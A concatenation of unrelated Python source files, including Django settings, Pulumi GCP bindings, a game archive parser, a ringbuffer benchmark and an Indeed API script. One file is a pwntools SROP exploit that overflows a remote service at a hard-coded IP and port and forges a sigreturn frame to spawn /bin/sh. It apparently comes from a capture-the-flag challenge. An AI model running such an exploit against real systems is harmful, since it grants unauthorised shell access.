(12, _("Minas Gerais")),
(13, _("Pará")),
(14, _("Paraíba")),
(15, _("Paraná")),
(16, _("Pernambuco")),
(17, _("Piauí")),
(18, _("Rio de Janeiro")),
(19, _("Rio Grande do Norte")),
(20, _("Rio Grande do Sul")),
(21, _("Rondônia")),
(22, _("Roraima")),
(23, _("Santa Catarina")),
(24, _("São Paulo")),
(25, _("Sergipe")),
(26, _("Tocantins")),
(27, _("Indeterminado")),
]
SALARY_RANGES = [
(1, "0,00 - 1.000,00"),
(2, "1.000,01 - 3.000,00"),
(3, "3.000,01 - 6.000,00"),
(4, "6.000,01 - 10.000,00"),
(5, "10.000,01 - 13.000,00"),
(6, "13.000,01 - 16.000,00"),
(7, "16.000,01 - 19.000,00"),
(8, "19.000,01 - 21.000,00"),
(9, "21.000,01 - +"),
(10, _("NI")),
]
JOB_LEVELS = [
(1, _("Estágio")),
(2, _("Junior")),
(3, _("Pleno")),
(4, _("Sênior")),
(5, _("Indeterminado")),
]
CONTRACT = [
(1, _("A combinar")),
(2, _("CLT")),
(3, _("PJ")),
(4, _("Estágio")),
]
FEEDBACK_TYPE = [(1, _("Sem feedback")), (2, _("Aprovado")), (3, _("Reprovado"))]
SITE_ID = config("SITE_ID", default=1, cast=int)
LINKEDIN_EMAIL = config("LINKEDIN_EMAIL", default=None)
LINKEDIN_PASSWORD = config("LINKEDIN_PASSWORD", default=None)
AUTHENTICATION_BACKENDS = (
"social_core.backends.github.GithubOAuth2",
"social_core.backends.linkedin.LinkedinOAuth2",
"django.contrib.auth.backends.ModelBackend",
)
SOCIAL_AUTH_GITHUB_KEY = config("SOCIAL_AUTH_GITHUB_KEY", default=None)
SOCIAL_AUTH_GITHUB_SECRET = config("SOCIAL_AUTH_GITHUB_SECRET", default=None)
SOCIAL_AUTH_LINKEDIN_OAUTH2_KEY = config(
"SOCIAL_AUTH_LINKEDIN_OAUTH2_KEY", default=None
)
SOCIAL_AUTH_LINKEDIN_OAUTH2_SECRET = config(
"SOCIAL_AUTH_LINKEDIN_OAUTH2_SECRET", default=None
)
SOCIAL_AUTH_LINKEDIN_OAUTH2_SCOPE = ["r_basicprofile", "r_emailaddress"]
SOCIAL_AUTH_LINKEDIN_OAUTH2_FIELD_SELECTORS = [
"email-address",
"formatted-name",
"public-profile-url",
"picture-url",
]
SOCIAL_AUTH_LINKEDIN_OAUTH2_EXTRA_DATA = [
("id", "id"),
("formattedName", "name"),
("emailAddress", "email_address"),
("pictureUrl", "picture_url"),
("publicProfileUrl", "profile_url"),
]
BLOG_API_URL = config("BLOG_API_URL", default=None)
|
py | 1a3f65e584f271f616d964f0b504892d0676f965 | from pwn import *
context.arch = 'amd64'
host = '5.101.72.234'
port = 33074
execve_syscall_num = 59
bin_sh_addr = 0x402000
syscall = 0x40100B
sigret = 0x401004
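# The gadget addresses are assumed to come from the target binary: `syscall` is taken as a bare
# syscall instruction, and `sigret` is presumed to set rax to SYS_rt_sigreturn before reaching it.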
if __name__ == "__main__":
#p = process( "./main" )
p = remote( host, port )
    payload = 'a' * 72
    payload += p64( sigret )
sigFrame = SigreturnFrame( kernel = "amd64" )
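    # Forge a sigreturn frame so that, once rt_sigreturn restores it, the registers encode
    # execve("/bin/sh", 0, 0) with rip pointing at the syscall gadget.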
sigFrame.rax = execve_syscall_num
sigFrame.rdi = bin_sh_addr
sigFrame.rsi = 0
sigFrame.rdx = 0
sigFrame.rip = syscall
    payload += str( sigFrame )
    p.send( payload + "\n" )
p.interactive()
|
py | 1a3f669446e2c7f3b236bae5f4e11623d41df1a9 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ConnectionArgs', 'Connection']
@pulumi.input_type
class ConnectionArgs:
def __init__(__self__, *,
network: pulumi.Input[str],
reserved_peering_ranges: pulumi.Input[Sequence[pulumi.Input[str]]],
service: pulumi.Input[str]):
"""
The set of arguments for constructing a Connection resource.
:param pulumi.Input[str] network: Name of VPC network connected with service producers using VPC peering.
:param pulumi.Input[Sequence[pulumi.Input[str]]] reserved_peering_ranges: Named IP address range(s) of PEERING type reserved for
this service provider. Note that invoking this method with a different range when connection
is already established will not reallocate already provisioned service producer subnetworks.
:param pulumi.Input[str] service: Provider peering service that is managing peering connectivity for a
service provider organization. For Google services that support this functionality it is
'servicenetworking.googleapis.com'.
"""
pulumi.set(__self__, "network", network)
pulumi.set(__self__, "reserved_peering_ranges", reserved_peering_ranges)
pulumi.set(__self__, "service", service)
@property
@pulumi.getter
def network(self) -> pulumi.Input[str]:
"""
Name of VPC network connected with service producers using VPC peering.
"""
return pulumi.get(self, "network")
@network.setter
def network(self, value: pulumi.Input[str]):
pulumi.set(self, "network", value)
@property
@pulumi.getter(name="reservedPeeringRanges")
def reserved_peering_ranges(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
Named IP address range(s) of PEERING type reserved for
this service provider. Note that invoking this method with a different range when connection
is already established will not reallocate already provisioned service producer subnetworks.
"""
return pulumi.get(self, "reserved_peering_ranges")
@reserved_peering_ranges.setter
def reserved_peering_ranges(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "reserved_peering_ranges", value)
@property
@pulumi.getter
def service(self) -> pulumi.Input[str]:
"""
Provider peering service that is managing peering connectivity for a
service provider organization. For Google services that support this functionality it is
'servicenetworking.googleapis.com'.
"""
return pulumi.get(self, "service")
@service.setter
def service(self, value: pulumi.Input[str]):
pulumi.set(self, "service", value)
@pulumi.input_type
class _ConnectionState:
def __init__(__self__, *,
network: Optional[pulumi.Input[str]] = None,
peering: Optional[pulumi.Input[str]] = None,
reserved_peering_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
service: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Connection resources.
:param pulumi.Input[str] network: Name of VPC network connected with service producers using VPC peering.
:param pulumi.Input[str] peering: (Computed) The name of the VPC Network Peering connection that was created by the service producer.
:param pulumi.Input[Sequence[pulumi.Input[str]]] reserved_peering_ranges: Named IP address range(s) of PEERING type reserved for
this service provider. Note that invoking this method with a different range when connection
is already established will not reallocate already provisioned service producer subnetworks.
:param pulumi.Input[str] service: Provider peering service that is managing peering connectivity for a
service provider organization. For Google services that support this functionality it is
'servicenetworking.googleapis.com'.
"""
if network is not None:
pulumi.set(__self__, "network", network)
if peering is not None:
pulumi.set(__self__, "peering", peering)
if reserved_peering_ranges is not None:
pulumi.set(__self__, "reserved_peering_ranges", reserved_peering_ranges)
if service is not None:
pulumi.set(__self__, "service", service)
@property
@pulumi.getter
def network(self) -> Optional[pulumi.Input[str]]:
"""
Name of VPC network connected with service producers using VPC peering.
"""
return pulumi.get(self, "network")
@network.setter
def network(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network", value)
@property
@pulumi.getter
def peering(self) -> Optional[pulumi.Input[str]]:
"""
(Computed) The name of the VPC Network Peering connection that was created by the service producer.
"""
return pulumi.get(self, "peering")
@peering.setter
def peering(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "peering", value)
@property
@pulumi.getter(name="reservedPeeringRanges")
def reserved_peering_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Named IP address range(s) of PEERING type reserved for
this service provider. Note that invoking this method with a different range when connection
is already established will not reallocate already provisioned service producer subnetworks.
"""
return pulumi.get(self, "reserved_peering_ranges")
@reserved_peering_ranges.setter
def reserved_peering_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "reserved_peering_ranges", value)
@property
@pulumi.getter
def service(self) -> Optional[pulumi.Input[str]]:
"""
Provider peering service that is managing peering connectivity for a
service provider organization. For Google services that support this functionality it is
'servicenetworking.googleapis.com'.
"""
return pulumi.get(self, "service")
@service.setter
def service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service", value)
class Connection(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
network: Optional[pulumi.Input[str]] = None,
reserved_peering_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
service: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a private VPC connection with a GCP service provider. For more information see
[the official documentation](https://cloud.google.com/vpc/docs/configure-private-services-access#creating-connection)
and
[API](https://cloud.google.com/service-infrastructure/docs/service-networking/reference/rest/v1/services.connections).
## Example Usage
```python
import pulumi
import pulumi_gcp as gcp
peering_network = gcp.compute.Network("peeringNetwork")
private_ip_alloc = gcp.compute.GlobalAddress("privateIpAlloc",
purpose="VPC_PEERING",
address_type="INTERNAL",
prefix_length=16,
network=peering_network.id)
foobar = gcp.servicenetworking.Connection("foobar",
network=peering_network.id,
service="servicenetworking.googleapis.com",
reserved_peering_ranges=[private_ip_alloc.name])
```
## Import
ServiceNetworkingConnection can be imported using any of these accepted formats
```sh
$ pulumi import gcp:servicenetworking/connection:Connection peering_connection {{peering-network}}:{{service}}
```
```sh
$ pulumi import gcp:servicenetworking/connection:Connection peering_connection /projects/{{project}}/global/networks/{{peering-network}}:{{service}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] network: Name of VPC network connected with service producers using VPC peering.
:param pulumi.Input[Sequence[pulumi.Input[str]]] reserved_peering_ranges: Named IP address range(s) of PEERING type reserved for
this service provider. Note that invoking this method with a different range when connection
is already established will not reallocate already provisioned service producer subnetworks.
:param pulumi.Input[str] service: Provider peering service that is managing peering connectivity for a
service provider organization. For Google services that support this functionality it is
'servicenetworking.googleapis.com'.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ConnectionArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a private VPC connection with a GCP service provider. For more information see
[the official documentation](https://cloud.google.com/vpc/docs/configure-private-services-access#creating-connection)
and
[API](https://cloud.google.com/service-infrastructure/docs/service-networking/reference/rest/v1/services.connections).
## Example Usage
```python
import pulumi
import pulumi_gcp as gcp
peering_network = gcp.compute.Network("peeringNetwork")
private_ip_alloc = gcp.compute.GlobalAddress("privateIpAlloc",
purpose="VPC_PEERING",
address_type="INTERNAL",
prefix_length=16,
network=peering_network.id)
foobar = gcp.servicenetworking.Connection("foobar",
network=peering_network.id,
service="servicenetworking.googleapis.com",
reserved_peering_ranges=[private_ip_alloc.name])
```
## Import
ServiceNetworkingConnection can be imported using any of these accepted formats
```sh
$ pulumi import gcp:servicenetworking/connection:Connection peering_connection {{peering-network}}:{{service}}
```
```sh
$ pulumi import gcp:servicenetworking/connection:Connection peering_connection /projects/{{project}}/global/networks/{{peering-network}}:{{service}}
```
:param str resource_name: The name of the resource.
:param ConnectionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ConnectionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
network: Optional[pulumi.Input[str]] = None,
reserved_peering_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
service: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ConnectionArgs.__new__(ConnectionArgs)
if network is None and not opts.urn:
raise TypeError("Missing required property 'network'")
__props__.__dict__["network"] = network
if reserved_peering_ranges is None and not opts.urn:
raise TypeError("Missing required property 'reserved_peering_ranges'")
__props__.__dict__["reserved_peering_ranges"] = reserved_peering_ranges
if service is None and not opts.urn:
raise TypeError("Missing required property 'service'")
__props__.__dict__["service"] = service
__props__.__dict__["peering"] = None
super(Connection, __self__).__init__(
'gcp:servicenetworking/connection:Connection',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
network: Optional[pulumi.Input[str]] = None,
peering: Optional[pulumi.Input[str]] = None,
reserved_peering_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
service: Optional[pulumi.Input[str]] = None) -> 'Connection':
"""
Get an existing Connection resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] network: Name of VPC network connected with service producers using VPC peering.
:param pulumi.Input[str] peering: (Computed) The name of the VPC Network Peering connection that was created by the service producer.
:param pulumi.Input[Sequence[pulumi.Input[str]]] reserved_peering_ranges: Named IP address range(s) of PEERING type reserved for
this service provider. Note that invoking this method with a different range when connection
is already established will not reallocate already provisioned service producer subnetworks.
:param pulumi.Input[str] service: Provider peering service that is managing peering connectivity for a
service provider organization. For Google services that support this functionality it is
'servicenetworking.googleapis.com'.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ConnectionState.__new__(_ConnectionState)
__props__.__dict__["network"] = network
__props__.__dict__["peering"] = peering
__props__.__dict__["reserved_peering_ranges"] = reserved_peering_ranges
__props__.__dict__["service"] = service
return Connection(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def network(self) -> pulumi.Output[str]:
"""
Name of VPC network connected with service producers using VPC peering.
"""
return pulumi.get(self, "network")
@property
@pulumi.getter
def peering(self) -> pulumi.Output[str]:
"""
(Computed) The name of the VPC Network Peering connection that was created by the service producer.
"""
return pulumi.get(self, "peering")
@property
@pulumi.getter(name="reservedPeeringRanges")
def reserved_peering_ranges(self) -> pulumi.Output[Sequence[str]]:
"""
Named IP address range(s) of PEERING type reserved for
this service provider. Note that invoking this method with a different range when connection
is already established will not reallocate already provisioned service producer subnetworks.
"""
return pulumi.get(self, "reserved_peering_ranges")
@property
@pulumi.getter
def service(self) -> pulumi.Output[str]:
"""
Provider peering service that is managing peering connectivity for a
service provider organization. For Google services that support this functionality it is
'servicenetworking.googleapis.com'.
"""
return pulumi.get(self, "service")
|
py | 1a3f698745f7e19d4ec5a5790be012d33d025f51 | import dataclasses
import typing
from typing import Optional
import construct
from construct import (
Struct, PrefixedArray, Int64ul, Int32ul, Hex, Construct, Computed, Array, Tell,
Aligned, FocusedSeq, Rebuild, Seek, Pointer, Prefixed, GreedyBytes,
)
from mercury_engine_data_structures import dread_data
from mercury_engine_data_structures.construct_extensions.alignment import AlignTo
from mercury_engine_data_structures.construct_extensions.misc import Skip
from mercury_engine_data_structures.formats.base_resource import BaseResource, NameOrAssetId, resolve_asset_id, AssetId
from mercury_engine_data_structures.game_check import Game
Construct_AssetId = Hex(Int64ul)
def offset_for(con: Struct, name: str):
result = 0
for sc in con.subcons:
sc = typing.cast(Construct, sc)
if sc.name == name:
return result
result += sc.sizeof()
raise construct.ConstructError(f"Unknown field: {name}")
def header_field(field_name: str):
offset = offset_for(FileEntry, field_name)
    def result(ctx):
        # Walk up the chain of parent parsing contexts to the outermost one.
        parents = [ctx]
        while "_" in parents[-1]:
            parents.append(parents[-1]["_"])
        start_headers = None
        index = None
        # The offset of the header table is recorded in the outermost context...
        for c in reversed(parents):
            if "_start_headers" in c:
                start_headers = c["_start_headers"]
                break
        # ...while the index of the current file entry lives closest to us.
        for c in parents:
            if "_resource_index" in c:
                index = c["_resource_index"]
                break
        if index is None or start_headers is None:
            raise ValueError("Missing required context key")
        # Absolute position of the requested field inside this entry's header record.
        return start_headers + (index * FileEntry.sizeof()) + offset
return result
FileEntry = Struct(
asset_id=Construct_AssetId,
start_offset=Int32ul,
end_offset=Int32ul,
)
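# Illustrative note (not part of the original module): with the layout above,
# offset_for(FileEntry, "start_offset") evaluates to 8 (right after the 64-bit
# asset id) and offset_for(FileEntry, "end_offset") to 12.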
PKGHeader = Struct(
header_size=Int32ul,
data_section_size=Int32ul,
file_entries=PrefixedArray(Int32ul, FileEntry),
)
PKG = Struct(
_header_size=Skip(1, Int32ul),
_data_section_size_address=Tell,
_data_section_size=Skip(1, Int32ul),
_num_files=Rebuild(Int32ul, construct.len_(construct.this.files)),
_start_headers=Tell,
_skip_headers=Seek(lambda ctx: ctx._num_files * FileEntry.sizeof(), 1),
_align=AlignTo(128),
_files_start=Tell,
_update_header_size=Pointer(
0x0,
Rebuild(Int32ul, lambda ctx: ctx._files_start - Int32ul.sizeof()),
),
files=Array(
construct.this._num_files,
Aligned(8, FocusedSeq(
"item",
_resource_index=Computed(lambda ctx: ctx["_index"]),
actual_start_offset=Tell,
start_offset=Pointer(header_field("start_offset"),
Rebuild(Int32ul, lambda ctx: ctx.actual_start_offset)),
end_offset=Pointer(header_field("end_offset"),
Rebuild(Int32ul, lambda ctx: ctx.start_offset + len(ctx.item.data))),
item_size=Computed(lambda ctx: ctx.end_offset - ctx.start_offset),
item=Struct(
asset_id=Pointer(header_field("asset_id"), Construct_AssetId),
asset_name=Computed(lambda ctx: dread_data.name_for_asset_id(ctx.asset_id)),
data=Prefixed(
Rebuild(
Computed(lambda ctx: ctx._.item_size),
construct.len_(construct.this.data),
),
GreedyBytes,
),
),
)),
),
_files_end=Tell,
_update_data_section_size=Pointer(
lambda ctx: ctx._data_section_size_address,
Rebuild(Int32ul, lambda ctx: ctx._files_end - ctx._files_start),
),
)
@dataclasses.dataclass(frozen=True)
class PkgFile:
asset_id: AssetId
data: bytes
@property
def asset_name(self) -> Optional[str]:
return dread_data.name_for_asset_id(self.asset_id)
class Pkg(BaseResource):
@classmethod
def construct_class(cls, target_game: Game) -> Construct:
return PKG
@classmethod
def parse_stream(cls, stream: typing.BinaryIO, target_game: Game) -> "Pkg":
return cls(cls.construct_class(target_game).parse_stream(stream, target_game=target_game),
target_game)
def build_stream(self, stream: typing.BinaryIO) -> bytes:
return self.construct_class(self.target_game).build_stream(self._raw, stream, target_game=self.target_game)
@property
def all_assets(self) -> typing.Iterator[PkgFile]:
for file in self.raw.files:
yield PkgFile(file.asset_id, file.data)
def get_asset(self, asset_id: NameOrAssetId) -> Optional[bytes]:
asset_id = resolve_asset_id(asset_id)
for file in self.raw.files:
if file.asset_id == asset_id:
return file.data
return None
def replace_asset(self, asset_id: NameOrAssetId, new_file: bytes):
asset_id = resolve_asset_id(asset_id)
for file in self.raw.files:
if file.asset_id == asset_id:
file.data = new_file
return
raise ValueError(f"Unknown asset id: {asset_id}")
def add_asset(self, asset_id: NameOrAssetId, new_file: bytes):
asset_id = resolve_asset_id(asset_id)
if self.get_asset(asset_id) is not None:
raise ValueError(f"Asset id already exists: {asset_id}")
self.raw.files.append(construct.Container(
asset_id=asset_id,
data=new_file,
))
def remove_asset(self, asset_id: NameOrAssetId):
asset_id = resolve_asset_id(asset_id)
for file in self.raw.files:
if file.asset_id == asset_id:
self.raw.files.remove(file)
return
raise ValueError(f"Unknown asset id: {asset_id}")
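# Illustrative usage sketch (not part of the original module): parse a .pkg
# archive, list its assets and write it back out. The file path and the Game
# member used below are assumptions made for this example only.
if __name__ == "__main__":
    import pathlib
    example_path = pathlib.Path("example/files.pkg")  # hypothetical input file
    if example_path.exists():
        with example_path.open("rb") as stream:
            pkg = Pkg.parse_stream(stream, Game.DREAD)  # Game member assumed
        for file in pkg.all_assets:
            print(hex(file.asset_id), file.asset_name)
        with (example_path.parent / "repacked.pkg").open("wb") as stream:
            pkg.build_stream(stream)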
|
py | 1a3f6a7451c5a2a1637eab0a25d43c7915483ef5 | # -*- coding: utf-8 -*-
"""
30-07-2019
Dennis van Gils
"""
from timeit import timeit
setup = """
import numpy as np
from numpy_ringbuffer import RingBuffer
from collections import deque
import os,sys,inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0,parentdir)
from dvg_ringbuffer import RingBuffer as DvG_RingBuffer
np.random.seed(0)
N_buffers_passed = 100
buffer_size = 500
deque_size = 20500
rb1 = RingBuffer(capacity=deque_size)
rb2 = DvG_RingBuffer(capacity=deque_size)
dq1 = deque(maxlen=deque_size)
def try1():
for i in range(N_buffers_passed):
rb1.extend(np.random.randn(buffer_size))
if rb1.is_full:
c = rb1[0:100]
#d = np.asarray(rb2)
#print(c.__array_interface__['data'][0])
def try2():
for i in range(N_buffers_passed):
rb2.extend(np.random.randn(buffer_size))
if rb2.is_full:
c = rb2[0:100]
#d = np.asarray(rb2)
#print(c.__array_interface__['data'][0])
def try3():
for i in range(N_buffers_passed):
dq1.extend(np.random.randn(buffer_size))
if len(dq1) == dq1.maxlen:
c = (np.array(dq1))[0:100]
#print(c.__array_interface__['data'][0])
"""
N = 100
print("Numpy RingBuffer strategies")
print(
"unwrap default : %.3f ms"
% (timeit("try1()", setup=setup, number=N) / N * 1000)
)
print(
"unwrap into buffer: %.3f ms"
% (timeit("try2()", setup=setup, number=N) / N * 1000)
)
print("Slow deque")
print(
"deque : %.3f ms"
% (timeit("try3()", setup=setup, number=N) / N * 1000)
)
|
py | 1a3f6b3274b10d85f89029b073b7bc2b80c64b8f | import numpy as np
from pymoo.algorithms.genetic_algorithm import GeneticAlgorithm
from pymoo.model.individual import Individual
from pymoo.model.survival import Survival
from pymoo.operators.crossover.simulated_binary_crossover import SimulatedBinaryCrossover
from pymoo.operators.default_operators import set_if_none
from pymoo.operators.mutation.polynomial_mutation import PolynomialMutation
from pymoo.operators.sampling.random_sampling import RandomSampling
from pymoo.operators.selection.tournament_selection import TournamentSelection, compare
from pymoo.util.display import disp_multi_objective
from pymoo.util.dominator import Dominator
from pymoo.util.non_dominated_sorting import NonDominatedSorting
from pymoo.util.randomized_argsort import randomized_argsort
class NSGA2(GeneticAlgorithm):
def __init__(self, pop_size=100, **kwargs):
        # always use an Individual object so that rank and crowding can be stored
kwargs['individual'] = Individual(rank=np.inf, crowding=-1)
# default settings for nsga2 - not overwritten if provided as kwargs
set_if_none(kwargs, 'pop_size', pop_size)
set_if_none(kwargs, 'sampling', RandomSampling())
set_if_none(kwargs, 'selection', TournamentSelection(func_comp=binary_tournament))
set_if_none(kwargs, 'crossover', SimulatedBinaryCrossover(prob_cross=0.9, eta_cross=15))
set_if_none(kwargs, 'mutation', PolynomialMutation(prob_mut=None, eta_mut=20))
set_if_none(kwargs, 'survival', RankAndCrowdingSurvival())
set_if_none(kwargs, 'eliminate_duplicates', True)
super().__init__(**kwargs)
self.tournament_type = 'comp_by_dom_and_crowding'
self.func_display_attrs = disp_multi_objective
def binary_tournament(pop, P, algorithm, **kwargs):
if P.shape[1] != 2:
raise ValueError("Only implemented for binary tournament!")
tournament_type = algorithm.tournament_type
S = np.full(P.shape[0], np.nan)
for i in range(P.shape[0]):
a, b = P[i, 0], P[i, 1]
# if at least one solution is infeasible
if pop[a].CV > 0.0 or pop[b].CV > 0.0:
S[i] = compare(a, pop[a].CV, b, pop[b].CV, method='smaller_is_better', return_random_if_equal=True)
# both solutions are feasible
else:
if tournament_type == 'comp_by_dom_and_crowding':
rel = Dominator.get_relation(pop[a].F, pop[b].F)
if rel == 1:
S[i] = a
elif rel == -1:
S[i] = b
elif tournament_type == 'comp_by_rank_and_crowding':
S[i] = compare(a, pop[a].rank, b, pop[b].rank,
method='smaller_is_better')
else:
raise Exception("Unknown tournament type.")
# if rank or domination relation didn't make a decision compare by crowding
if np.isnan(S[i]):
S[i] = compare(a, pop[a].get("crowding"), b, pop[b].get("crowding"),
method='larger_is_better', return_random_if_equal=True)
return S[:, None].astype(np.int)
class RankAndCrowdingSurvival(Survival):
def __init__(self) -> None:
super().__init__(True)
def _do(self, pop, n_survive, D=None, **kwargs):
# get the objective space values and objects
F = pop.get("F")
# the final indices of surviving individuals
survivors = []
# do the non-dominated sorting until splitting front
fronts = NonDominatedSorting().do(F, n_stop_if_ranked=n_survive)
for k, front in enumerate(fronts):
# calculate the crowding distance of the front
crowding_of_front = calc_crowding_distance(F[front, :])
# save rank and crowding in the individual class
for j, i in enumerate(front):
pop[i].set("rank", k)
pop[i].set("crowding", crowding_of_front[j])
# current front sorted by crowding distance if splitting
if len(survivors) + len(front) > n_survive:
I = randomized_argsort(crowding_of_front, order='descending', method='numpy')
I = I[:(n_survive - len(survivors))]
# otherwise take the whole front unsorted
else:
I = np.arange(len(front))
# extend the survivors by all or selected individuals
survivors.extend(front[I])
return pop[survivors]
def calc_crowding_distance(F):
infinity = 1e+14
n_points = F.shape[0]
n_obj = F.shape[1]
if n_points <= 2:
return np.full(n_points, infinity)
else:
# sort each column and get index
I = np.argsort(F, axis=0, kind='mergesort')
# now really sort the whole array
F = F[I, np.arange(n_obj)]
# get the distance to the last element in sorted list and replace zeros with actual values
dist = np.concatenate([F, np.full((1, n_obj), np.inf)]) \
- np.concatenate([np.full((1, n_obj), -np.inf), F])
index_dist_is_zero = np.where(dist == 0)
dist_to_last = np.copy(dist)
for i, j in zip(*index_dist_is_zero):
dist_to_last[i, j] = dist_to_last[i - 1, j]
dist_to_next = np.copy(dist)
for i, j in reversed(list(zip(*index_dist_is_zero))):
dist_to_next[i, j] = dist_to_next[i + 1, j]
# normalize all the distances
norm = np.max(F, axis=0) - np.min(F, axis=0)
norm[norm == 0] = np.nan
dist_to_last, dist_to_next = dist_to_last[:-1] / norm, dist_to_next[1:] / norm
        # if we divided by zero because all values in one column are equal, replace the resulting NaNs with zero
dist_to_last[np.isnan(dist_to_last)] = 0.0
dist_to_next[np.isnan(dist_to_next)] = 0.0
# sum up the distance to next and last and norm by objectives - also reorder from sorted list
J = np.argsort(I, axis=0)
crowding = np.sum(dist_to_last[J, np.arange(n_obj)] + dist_to_next[J, np.arange(n_obj)], axis=1) / n_obj
# replace infinity with a large number
crowding[np.isinf(crowding)] = infinity
return crowding
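# Illustrative only (not part of the original module): sanity-check the
# crowding distance helper on a tiny two-objective front.
if __name__ == "__main__":
    F_demo = np.array([[0.0, 1.0], [0.5, 0.5], [1.0, 0.0]])
    print(calc_crowding_distance(F_demo))
    # The two boundary points receive the large "infinity" placeholder value,
    # while the middle point gets a finite crowding distance (1.0 here).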
|
py | 1a3f6df061d10fe8ce93e74eb544e09463845970 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Discovery models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from ralph.discovery.models_device import (
Connection,
ConnectionType,
Database,
DatabaseType,
DeprecationKind,
Device,
DeviceEnvironment,
DeviceModel,
DeviceType,
DISK_PRODUCT_BLACKLIST,
DISK_VENDOR_BLACKLIST,
LoadBalancerMember,
LoadBalancerPool,
LoadBalancerType,
LoadBalancerVirtualServer,
MarginKind,
NetworkConnection,
ReadOnlyDevice,
SERIAL_BLACKLIST,
ServiceCatalog,
UptimeSupport,
)
from ralph.discovery.models_network import (
DataCenter,
DiscoveryQueue,
Environment,
IPAddress,
IPAlias,
Network,
NetworkKind,
NetworkTerminator,
)
from ralph.discovery.models_component import (
ComponentModel,
ComponentType,
DiskShare,
DiskShareMount,
Ethernet,
EthernetSpeed,
FibreChannel,
GenericComponent,
MAC_PREFIX_BLACKLIST,
Memory,
OperatingSystem,
Processor,
Software,
SplunkUsage,
Storage,
)
from ralph.discovery.models_history import (
DiscoveryValue,
HistoryChange,
)
ASSET_NOT_REQUIRED = (
DeviceType.rack,
DeviceType.blade_system,
DeviceType.management,
DeviceType.power_distribution_unit,
DeviceType.data_center,
DeviceType.switch_stack,
DeviceType.virtual_server,
DeviceType.cloud_server,
DeviceType.unknown
)
__all__ = [
'DataCenter',
'DiscoveryQueue',
'Environment',
'IPAddress',
'IPAlias',
'MAC_PREFIX_BLACKLIST',
'Network',
'NetworkKind',
'NetworkTerminator',
'ComponentModel',
'ComponentType',
'DiskShare',
'DiskShareMount',
'Ethernet',
'EthernetSpeed',
'FibreChannel',
'GenericComponent',
'Memory',
'OperatingSystem',
'Processor',
'Software',
'SplunkUsage',
'Storage',
'DISK_PRODUCT_BLACKLIST',
'DISK_VENDOR_BLACKLIST',
'Database',
'DatabaseType',
'DeprecationKind',
'Device',
'DeviceEnvironment',
'DeviceModel',
'DeviceType',
'Connection',
'ConnectionType',
'LoadBalancerMember',
'LoadBalancerPool',
'LoadBalancerType',
'LoadBalancerVirtualServer',
'MarginKind',
'NetworkConnection',
'ReadOnlyDevice',
'SERIAL_BLACKLIST',
'ServiceCatalog',
'UptimeSupport',
'HistoryChange',
'DiscoveryValue',
'ASSET_NOT_REQUIRED',
]
# Load the plugins code
import ralph.discovery.plugins # noqa
|
py | 1a3f6e83d9d2e7433396e8ee411613f34bd6ef1d | import os
from dotenv import find_dotenv, load_dotenv
import socket
from indeed import IndeedClient
import re
project_dir = os.path.join(os.path.dirname(__file__), os.pardir, os.pardir)
def get_ip():
return socket.gethostbyname(socket.gethostname())
# Set static user parameters
load_dotenv(find_dotenv())
indeed_pub_id = os.environ.get("INDEED_PUB_ID")
user_agent = os.environ.get("DEF_USER_AGENT")
static_params = {
'userip' : get_ip(),
'useragent' : user_agent
}
client = IndeedClient(indeed_pub_id)
# Script that pulls job search data using Indeed's api
def job_search(params):
# query and location parameters are required
if "q" not in params:
print("Please include query parameter")
return None
if "l" not in params:
print("Please include location parameter")
return None
params.update(static_params)
search_response = client.search(**params)
return search_response
def job_details(keys):
